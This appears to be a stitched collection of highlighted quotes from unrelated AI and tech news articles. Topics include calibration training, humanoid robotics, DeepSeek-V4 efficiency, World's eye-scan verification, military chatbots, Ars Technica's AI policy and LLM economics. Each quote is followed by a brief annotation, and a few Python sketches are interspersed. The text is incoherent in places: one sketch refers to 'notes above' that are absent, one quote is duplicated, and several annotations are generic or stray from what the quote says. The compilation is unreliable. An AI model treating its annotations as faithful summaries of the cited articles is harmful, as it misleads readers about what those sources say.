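The unified action-mapping idea in the WorldMark notes above can be sketched as one adapter per model. Everything concrete here is an assumption for illustration: the two model names and their native control formats are invented, and `translate` is a hypothetical helper, not WorldMark's code.

```python
from typing import Callable


def to_keyboard_model(action: str) -> dict:
    """Hypothetical model that takes raw key presses."""
    return {"keys": [action.upper()]}


def to_camera_model(action: str) -> dict:
    """Hypothetical model that takes camera translations (unit steps assumed)."""
    deltas = {"w": (0, 1), "s": (0, -1), "a": (-1, 0), "d": (1, 0)}
    dx, dz = deltas[action]
    return {"dx": dx, "dz": dz}


# One adapter per model; the shared vocabulary is the four WASD keys.
ADAPTERS: dict[str, Callable[[str], dict]] = {
    "keyboard-model": to_keyboard_model,
    "camera-model": to_camera_model,
}


def translate(model: str, trajectory: str) -> list[dict]:
    """Turn a shared WASD trajectory into one model's native control format."""
    adapter = ADAPTERS[model]
    return [adapter(action) for action in trajectory.lower()]


for model in ADAPTERS:
    print(model, translate(model, "WWD"))
```

Because every model receives the same trajectory string, differences in the generated video come from the models rather than from mismatched inputs.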
These papers suggest that strategic data engineering and inference-time optimization can substitute for raw parameter count.
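This suggests that data engineering and inference-time optimization can raise model performance, offering a different route to model optimization.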
Both illustrate how decomposing complex tasks across specialized agents can address problems that monolithic models handle poorly.
This presents the advantage of multi-agent architectures on complex tasks, offering a way to address problems that a single model handles poorly.
The quality and structure of training data matters more than its volume.
This stresses the importance of data quality in model training and gives direction to data engineering and training practice.
Small models that punch far above their weight class.
This challenges conventional wisdom by showing that small models can excel on specific tasks, offering new ideas for model miniaturization.
The most urgent finding this week comes from researchers who demonstrated that the very mechanism enabling agents to use tools - function calling - can be hijacked with alarming reliability.
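The finding exposes a security weakness in the tool-calling interface of AI agents and poses a new challenge for building secure agent systems.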
Confidently wrong answers are penalized. So are unnecessarily uncertain correct ones.
RLCR encourages models to express uncertainty by penalizing both confidently wrong answers and unnecessarily uncertain correct ones.
Nothing in between. A model that arrives at the correct answer through careful reasoning receives the same reward as one that guesses correctly by chance.
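The passage exposes the problem with current training: it does not distinguish careful reasoning from a lucky guess, which makes models overconfident.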
RLCR reduced calibration error by up to 90 percent while maintaining or improving accuracy
This key result shows that RLCR reduces calibration error while maintaining or even improving accuracy, which supports its effectiveness.
They deliver every answer with the same unshakable certainty, whether they're right or guessing.
This describes the overconfidence common to current AI models: they give equally firm answers whether right or wrong.
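The reward shaping described in the RLCR notes above, where confident errors and needlessly hesitant correct answers both lose reward, can be sketched with a squared-error penalty on the stated confidence. The Brier-style penalty and the name `calibrated_reward` are assumptions made for this example; the notes only say that both cases are penalized.

```python
def calibrated_reward(is_correct: bool, confidence: float) -> float:
    """Correctness reward minus a Brier-style penalty on stated confidence.

    confidence is the model's own probability that its answer is right.
    """
    if not 0.0 <= confidence <= 1.0:
        raise ValueError("confidence must be between 0 and 1")
    correctness = 1.0 if is_correct else 0.0
    penalty = (confidence - correctness) ** 2  # 0 when perfectly calibrated
    return correctness - penalty


cases = [(True, 0.9), (True, 0.5), (False, 0.9), (False, 0.1)]
for is_correct, confidence in cases:
    reward = calibrated_reward(is_correct, confidence)
    print(f"correct={is_correct} confidence={confidence}: reward={reward:+.2f}")
```

With a purely binary reward, the two correct cases would score the same and so would the two wrong ones; the penalty term is what separates them.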
Ultimately, by inducing a highly aligned cross-embodiment representation, UniT offers a scalable path to distill vast human knowledge into general-purpose humanoid capabilities.
A claim worth careful thought: UniT may offer a way to turn human knowledge into general-purpose humanoid capabilities, a new direction for humanoid robotics.
This alignment ensures that human data seamlessly translates into enhanced action controllability for humanoid video generation.
This highlights UniT's role in translating human data into better action controllability for humanoid video generation.
By predicting these unified tokens, it effectively leverages diverse human data to achieve state-of-the-art data efficiency and robust out-of-distribution (OOD) generalization.
This result shows UniT's potential to use human data for data-efficient learning and robust generalization.
Scaling humanoid foundation models is bottlenecked by the scarcity of robotic data.
This identifies the current bottleneck in scaling humanoid models, the scarcity of robot data, and points to directions for future research.
We look at reference classes, factory buildout timelines, and upstream component supply to estimate plausible production rates for humanoids, quadrupeds, robotic arms, wheeled robots, and drones.
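The study estimates plausible production rates for humanoids, quadrupeds, robotic arms, wheeled robots, and drones from reference classes, factory buildout timelines, and upstream component supply, which amounts to a new estimation framework.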
We make products, tools, and datasets available to everyone with the goal of building a more collaborative ecosystem.
Beginners should note how providing products, tools, and datasets helps build a more collaborative research ecosystem.
Publishing our work allows us to share ideas and work collaboratively to advance the field of computer science.
Beginners should recognize that sharing research results is key to advancing computer science.
We regularly open-source projects with the broader research community and apply our developments to Google products.
Beginners should learn how research is opened to the community and applied to real products, which is key to moving research forward.
Our researchers drive advancements in computer science through both fundamental and applied research.
Beginners should understand that fundamental and applied research matter equally in advancing computer science.
We strive to create an environment conducive to many different types of research across many different time scales and levels of risk.
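Beginners may overlook the importance of different types of research, and how different time scales and risk levels shape the research environment.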
This richly layered collage poster features art, science, history, design, and global culture surrounding the phrase “Create Everything at Once,” blending planets, anatomy sketches, maps, architecture, symbols, crystals, and mixed media imagery into a vibrant creative mosaic.
The article showcases the variety and creativity of ChatGPT Images 2.0, but it remains to be seen whether that variety meets the needs of different users.
Greater precision and control
The statement may be biased: how "Greater precision and control" is achieved, and how users rate it, still needs to be established.
This poster-style image introduces “ChatGPT Images 2.0” with a bold editorial layout, blocks of explanatory text, and geometric shapes in red, black, blue, and yellow.
This describes the visual style of a ChatGPT Images 2.0 image; whether the style was specified by the user or chosen by the system should be checked.
A new era of image generation
The article's core claim is that ChatGPT Images 2.0 marks a new era of image generation, which calls for a closer look at how it changes existing image generation.
These innovations are designed to achieve a 73% reduction in per-token inference FLOPs and a 90% reduction in KV cache memory burden compared with DeepSeek-V3.2.
This highlights the significant performance improvements in the V4 architecture over its predecessor, which is crucial for understanding the benefits of upgrading.
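A quick arithmetic sketch of what those two percentages imply, assuming they are simple ratios against the DeepSeek-V3.2 baseline (the function names here are illustrative and not taken from the source):

```python
def remaining_fraction(reduction_pct: float) -> float:
    """Fraction of the baseline cost left after a given percentage reduction."""
    return 1.0 - reduction_pct / 100.0


def improvement_factor(reduction_pct: float) -> float:
    """How many times smaller the new cost is than the baseline."""
    return 1.0 / remaining_fraction(reduction_pct)


# Figures quoted in the excerpt above.
flops_factor = improvement_factor(73)     # per-token inference FLOPs
kv_cache_factor = improvement_factor(90)  # KV cache memory burden

print(f"FLOPs per token: {remaining_fraction(73):.0%} of baseline, "
      f"about {flops_factor:.1f}x fewer")
print(f"KV cache memory: {remaining_fraction(90):.0%} of baseline, "
      f"about {kv_cache_factor:.0f}x smaller")
```

Read this way, a 73% reduction leaves about 27% of the baseline FLOPs (roughly 3.7x fewer), and a 90% reduction leaves about 10% of the KV cache memory (roughly 10x smaller).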
We’ve lost the moral compass for what we invest into
We have lost our moral compass for where we put our investments.
There is an aspect of entrepreneurship where you’re rewarded for selling a vision of what could be, and it doesn’t always get realized.
One side of entrepreneurship is that you are rewarded for selling an idea that might become reality, even though it is not always realized.
The true founders—not the ones who want to make a lot of money or do it because their roommates want to do it—are closer to artists than to any other profession.
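True founders, as opposed to those who want to make a lot of money or who do it because their roommates want to, are closer to artists than to any other profession.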
For Silicon Valley investors, sorting out the students who can make it big from the wannabes has become a high-stakes competition.
For Silicon Valley investors, telling the students who can succeed apart from the wannabes has become a high-stakes competition.
These teenagers are sometimes handed “pre-idea funding”—hundreds of thousands of dollars, or in rare cases, even millions—before they have the glimmer of an actual company in mind.
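Strikingly, some young people receive "pre-idea" funding of hundreds of thousands or even millions of dollars before they have any actual company in mind.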
Even with that, World has had trouble getting buy-in from the general public, and rightfully so. Trusting your biometrics to any third party seems like a mistake (just look at how well third-party verification services have handled the sensitive data entrusted to them for age-assurance checks).
This statement expresses a critical view of the technology, suggesting that public trust is a significant barrier, and it references past issues with third-party verification services, which could be a point of concern for readers.
The company reportedly has about 18 million verified users thus far, but many of them are people in developing nations who signed up because of the promise of Worldcoin, a cryptocurrency that has seemingly fallen out of World’s plans.
This statement raises questions about the demographics of the users and the sustainability of the verification process, especially in relation to the promised cryptocurrency.
The company is pitching itself as a potential solution to ticket scalping, and announced that it has built software called Concert Kit that ticketers can use to ensure only real people and not scalper bots are purchasing tickets.
This suggests a new application of the technology, but it doesn't provide evidence that the technology is effective against scalper bots, which is a significant claim.
World has already been working with Tinder and ran a pilot of the verification process in Japan. It was apparently enough of a success that Tinder will roll out the authentication method globally.
The success of the pilot in Japan is mentioned, but it's not clear what metrics were used to determine success, which could be a point of contention.
According to a press release, users will be required to undergo World’s verification method, which requires having their eyeballs scanned at a physical location with a proprietary device to prove they are human.
This quote highlights a significant requirement for users, which may raise concerns about privacy and the feasibility of such a process.
Sam Altman is banking on people being willing to surrender scans of their eyes in order to authenticate themselves
This statement suggests a reliance on user acceptance of a potentially invasive technology, which may be an overestimate of public willingness or a speculative assumption.
And it’s not just the US putting chatbots at commanders’ fingertips; China is commissioning similar tools, according to recent [analysis] by Georgetown University’s Center for Security and Emerging Technology.
To verify: whether China is in fact developing similar chatbot tools, and how exactly those tools are being used.
Today’s military personnel might give chatbots a list of potential targets to help decide which to strike first.
To verify: whether military personnel currently use chatbots in real operations to decide which targets to strike.
Algorithms that scour hours of surveillance footage and pick out, say, trucks with mounted machine guns date back to the war in Afghanistan.
To verify: whether all of the algorithms used in the war in Afghanistan were AI-based, and how they were applied and how well they worked.
The transition from isolated AI models to the aggregated, metered token economy will unlock the twenty-first.
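The author predicts that the shift from isolated AI models to an aggregated, metered token economy will open a new chapter for the twenty-first century.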
This dynamic forces a brutal new discipline in how enterprises deploy capital and architect their internal workflows.
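This dynamic forces enterprises to deploy capital and architect their internal workflows in a new way, which shows how deeply AI affects the way companies are managed.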
Consider the deep anatomy of an individual AI session to understand how this telemetry actually works in practice.
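The author calls for a close look at the internal structure of a single AI session in order to better understand how AI usage is measured.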
A token is the fundamental, indivisible unit of cognitive work. It is the exact equivalent of the kilowatt-hour for the artificial intelligence grid.
The author proposes the token as the basic unit of AI cognitive work; the idea is significant because it turns abstract AI into a measurable resource.
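To make the kilowatt-hour analogy concrete, here is a minimal sketch of metering a single session by its token counts. The `SessionUsage` type, the `session_cost` function, and the per-million-token prices are all hypothetical placeholders, not figures or APIs from the source or from any provider:

```python
from dataclasses import dataclass


@dataclass
class SessionUsage:
    """Token counts recorded for one AI session (hypothetical telemetry record)."""
    input_tokens: int
    output_tokens: int


def session_cost(usage: SessionUsage,
                 input_price_per_million: float,
                 output_price_per_million: float) -> float:
    """Bill a session the way a utility bills kilowatt-hours: units times rate."""
    total = (usage.input_tokens * input_price_per_million
             + usage.output_tokens * output_price_per_million)
    return total / 1_000_000


# Hypothetical session and hypothetical prices, for illustration only.
usage = SessionUsage(input_tokens=1_000_000, output_tokens=500_000)
cost = session_cost(usage, input_price_per_million=2.0, output_price_per_million=8.0)
print(f"Metered cost for this session: ${cost:.2f}")
```

The point of the sketch is only that once work is counted in tokens, a session's cost reduces to units multiplied by a rate, as with metered electricity.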
The grid standardized power. It violently divorced the complex generation of electricity from its seamless consumption.
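The author draws an analogy between the standardization of the power grid and the standardization of AI, implying that the AI field will go through a similar transformation.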
The smartest companies are no longer just hiring talent; they are purchasing synthetic intelligence by the gigawatt.
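This view shows the smartest companies moving beyond traditional hiring toward purchasing synthetic intelligence, which points to the rise of AI as a new kind of resource.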
The smartest companies are no longer just hiring talent; they are purchasing synthetic intelligence by the gigawatt.
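This view holds that the key to future competition between companies is no longer only hiring talent but also purchasing powerful synthetic intelligence, which suggests a central role for AI in how companies grow.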
Maintaining the standards in this policy is a shared obligation across our editorial operation.
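This statement stresses that upholding the policy's standards is a shared responsibility across the editorial team, reflecting a collective commitment.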
We do not publish AI-generated images, audio, or video as authentic documentation of real events.
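This rule states that Ars Technica will not present AI-generated images, audio, or video as authentic documentation of real events, reflecting its commitment to authenticity.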
Anyone who uses AI tools in our editorial workflow is responsible for the accuracy and integrity of the resulting work.
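This rule makes anyone who uses AI tools in Ars Technica's editorial workflow explicitly responsible for the accuracy and integrity of the resulting work.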
These standards have governed our editorial work since AI tooling became available.
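This statement says the standards have governed Ars Technica's editorial work since AI tooling became available, which shows how seriously it takes editorial practice.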
We don’t publish claims based solely on AI-generated summaries, and reporters may not represent any material as “reviewed” unless they have examined it directly.
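This rule shows that Ars Technica does not trust claims based solely on AI-generated summaries, and it stresses that reporters must examine material directly.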
Ars Technica is written by humans. Our reporting, analysis, and commentary are human-authored.
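This policy statement stresses that Ars Technica's writing is done by humans, and it casts doubt on a role for AI as the author of news reporting and analysis.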
We do not publish AI-generated images, audio, or video as authentic documentation of real events
Worth exploring: the ethical and legal issues raised by AI-generated content in news reporting.
Reporters may use AI tools vetted and approved for our workflow to assist with research
Worth finding out: which AI tools are approved for research, and how they assist reporters in that research.
Our reporting, analysis, and commentary are human-authored
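This stresses the distinct role of human authors; it is worth finding out how exactly AI is used to assist reporting, analysis, and commentary.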
AI cannot replace human insight, creativity, and ingenuity
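This is one of the article's core claims; it is worth looking further into how AI is actually used in journalism and how it affects human work.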
The issue for many people isn’t the technology itself (though there are many ethical issues in how it was trained). The issue is the stupid state of our capitalist system, and the weird way companies are trying to force it down everyone’s throats.
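The author takes a non-consensus position: the problem is not LLM technology itself but the capitalist system and the way companies force the technology on people.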
They also have the benefits of running on hardware that’s sipping power most of the time, rather than slurping it down in massive data centres.
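The advantage of local LLMs is that their hardware draws little power most of the time, which may lower operating costs and reduce the need for massive data centres.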
It’s already possible to run LLMs on local hardware, and that’s only going to get easier in the future.
This view anticipates a shift toward running LLMs locally, which could challenge LLM companies that depend on cloud services.
OpenAI in particular [has raised over $290 billion dollars of investment](https://www.owler.com/company/openai/funding), and has not yet turned a profit.
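This data point highlights the gap between the huge investment in OpenAI and its lack of profit, raising concerns about the long-term sustainability of LLM companies.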
Anthropic’s Head of Growth, Amol Avasare, said [this was caused by a “test” gone slightly wrong](https://x.com/TheAmolAvasare/status/2046788872517066971). Apparently only 2% of users were supposed to see the new pricing page.
This example shows how unstable pricing for large language models (LLMs) is, and how easily these companies can change prices, which may confuse consumers.
We've automated ourselves into Goodhart's law.
The author invokes Goodhart's law, arguing that we have automated ourselves into the situation it describes; a point worth recording.
The incentives almost guarantee we are in big trouble. Many workers, quite rationally, want to do well on whatever dimension they are being measured on. If they are judged by the surface-level quality of their work, then it's no surprise most of 'their' output will be written by LLMs.
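The author argues that current incentives almost guarantee big trouble: many workers rationally optimize for whatever they are measured on, which may lead to much of their output being written by LLMs.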
Large language models are great at simulating a style of writing without necessarily reproducing the quality of the work.
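This point shows that large language models can imitate a style of writing without necessarily reproducing the quality of the work, which is counterintuitive.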
All of knowledge work has this problem. It's hard to objectively judge the quality of someone's work without spending a lot of effort on it. Therefore everyone relies heavily on proxy measures.
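The author points out a problem common to all knowledge work: quality is hard to judge objectively without considerable effort, so people rely on proxy measures. The annotation regards this as a non-consensus view.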
You've received a report, a market analysis for the new product you're planning to launch. Reading through it you notice problems: the date on the report doesn't match the date you requested it on, it's from 6 months prior. Several paragraphs have obvious spelling errors. Some graphs are mislabeled and duplicated.
This example shows how we judge work by its surface quality, even though surface quality does not always reflect the actual quality of the work.
Critics called the manifesto [fascist](https://bsky.app/profile/gilduran.com/post/3mjwqsyj54s2a)
The label 'fascist' applied to the manifesto by critics suggests a strong negative perception of the company's political stance.
But for employees, the culture shift feels intentional. ‘I don’t want to assert that I have knowledge of what’s going on in their internal mind,’ one former worker tells WIRED. ‘But maybe it's gotten to a place where encouraging independent thought and questioning leads to some bad conclusions.’
This quote reflects a concern among employees about the company culture and its potential impact on independent thinking.